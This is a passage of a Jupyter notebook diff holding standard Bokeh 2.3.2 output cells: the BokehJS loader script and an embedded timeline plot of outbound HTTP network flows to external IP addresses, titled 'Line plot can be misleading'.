+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"5056\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"5056\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"4930ad1b-88a6-45f5-8af3-dee493b2fddd\" data-root-id=\"5058\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"0a67ca7d-6b4b-4cf3-b51c-332650240a9b\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"5069\"}],\"center\":[{\"id\":\"5072\"},{\"id\":\"5076\"},{\"id\":\"5119\"}],\"height\":300,\"left\":[{\"id\":\"5073\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"5096\"},{\"id\":\"5124\"}],\"right\":[{\"id\":\"5147\"}],\"title\":{\"id\":\"5059\"},\"toolbar\":{\"id\":\"5083\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"5061\"},\"x_scale\":{\"id\":\"5065\"},\"y_range\":{\"id\":\"5063\"},\"y_scale\":{\"id\":\"5067\"}},\"id\":\"5058\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"5107\"},{\"id\":\"5108\"},{\"id\":\"5109\"},{\"id\":\"5110\"},{\"id\":\"5111\"},{\"id\":\"5112\"},{\"id\":\"5113\"},{\"id\":\"5114\"},{\"id\":\"5115\"},{\"id\":\"5116\"},{\"id\":\"5117\"},{\"id\":\"5118\"}]},\"id\":\"5070\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5114\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5094\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5090\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5111\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5115\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"5067\",\"type\":\"LinearScale\"},{\"attributes\":{\"end\":1550157557600.0,\"start\":1549962994400.0},\"id\":\"5061\",\"type\":\"Range1d\"},{\"attributes\":{\"line_alpha\":0.7,\"line_color\":\"#440154\",\"line_width\":2,\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5122\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"5092\"}},\"id\":\"5097\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5112\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5116\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"5092\"},\"glyph\":{\"id\":\"5094\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5095\"},\"view\":{\"id\":\"5097\"}},\"id\":\"5096\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data_source\":{\"id\":\"5092\"},\"glyph\":{\"id\":\"5122\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5123\"},\"view\":{\"id\":\"5125\"}},\"id\":\"5124\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5065\",\"type\":\"LinearScale\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5108\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5063\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis\":{\"id\":\"5073\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5076\",\"type\":\"Grid\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5109\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"5057\"},{\"id\":\"5077\"},{\"id\":\"5078\"},{\"id\":\"5079\"},{\"id\":\"5080\"},{\"id\":\"5081\"}]},\"id\":\"5083\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"5090\"},\"major_label_policy\":{\"id\":\"5102\"},\"ticker\":{\"id\":\"5070\"}},\"id\":\"5069\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"13.107.4.50\",\"8.249.241.254\",\"23.48.36.78\",\"23.223.3.100\",\"205.185.216.42\",\"8.253.45.249\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"40.87.63.92\",\"40.80.145.38\",\"99.84.106.178\",\"23.3.13.106\",\"99.84.106.27\",\"23.45.180.234\",\"99.84.106.92\",\"72.21.81.240\",\"23.3.13.146\",\"23.3.13.112\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.91.29\",\"72.21.91.29\",\"23.4.187.27\",\"205.185.216.42\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"23.48.36.47\",\"13.107.4.50\",\"23.45.180.121\",\"72.21.91.29\",\"173.194.61.40\",\"216.58.218.238\",\"72.21.81.240\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"23.4.187.27\",\"72.21.81.240\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AACUXB+OdkIAgFxXMY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIDBQzWOdkIAgMFDNY52QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgHG1QI52QgCAa9lPjnZCAADeZVOOdkIAgH2mV452QgCA6/5ojnZCAICqWW2OdkIAgKpZbY52QgAATDp6jnZCAIComn6OdkIAAKknhY52QgAAqSeFjnZCAAAInoeOdkIAAAieh452QgAAnBqLjnZCAIAOoY+OdkIAgA6hj452QgAAfiSfjnZCAAB+JJ+OdkIAAIzao452QgAAjNqjjnZCAACQ/LmOdkIAAJD8uY52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"color\":[\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"5105\"},\"selection_policy\":{\"id\":\"5106\"}},\"id\":\"5092\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"5092\"}},\"id\":\"5125\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5099\",\"type\":\"AllLabels\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5110\",\"type\":\"DaysTicker\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"#440154\",\"line_width\":2,\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5123\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"5106\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis\":{\"id\":\"5069\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5072\",\"type\":\"Grid\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5082\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5113\",\"type\":\"DaysTicker\"},{\"attributes\":{\"label\":{\"value\":\"http\"},\"renderers\":[{\"id\":\"5096\"},{\"id\":\"5124\"}]},\"id\":\"5120\",\"type\":\"LegendItem\"},{\"attributes\":{\"text\":\"Line plot can be misleading\"},\"id\":\"5059\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"5074\",\"type\":\"BasicTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5077\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"items\":[{\"id\":\"5120\"}]},\"id\":\"5119\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"5101\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5095\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"5118\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"5080\",\"type\":\"SaveTool\"},{\"attributes\":{\"overlay\":{\"id\":\"5082\"}},\"id\":\"5078\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"axis_label\":\"TotalAllowedFlows\",\"formatter\":{\"id\":\"5101\"},\"major_label_policy\":{\"id\":\"5099\"},\"ticker\":{\"id\":\"5074\"}},\"id\":\"5073\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"5079\",\"type\":\"ResetTool\"},{\"attributes\":{\"click_policy\":\"hide\",\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"5147\",\"type\":\"Legend\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5117\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5081\",\"type\":\"PanTool\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@FlowStartTime\":\"datetime\"},\"tooltips\":[[\"FlowDirection\",\"@FlowDirection\"],[\"FlowStartTime\",\"@FlowStartTime{%F %T.%3N}\"],[\"TotalAllowedFlows\",\"@TotalAllowedFlows\"],[\"FlowType\",\"@FlowType\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"L7Protocol\",\"@L7Protocol\"]]},\"id\":\"5057\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"5105\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5102\",\"type\":\"AllLabels\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5107\",\"type\":\"AdaptiveTicker\"}],\"root_ids\":[\"5058\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"0a67ca7d-6b4b-4cf3-b51c-332650240a9b\",\"root_ids\":[\"5058\"],\"roots\":{\"5058\":\"4930ad1b-88a6-45f5-8af3-dee493b2fddd\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "5058"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"5274\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in 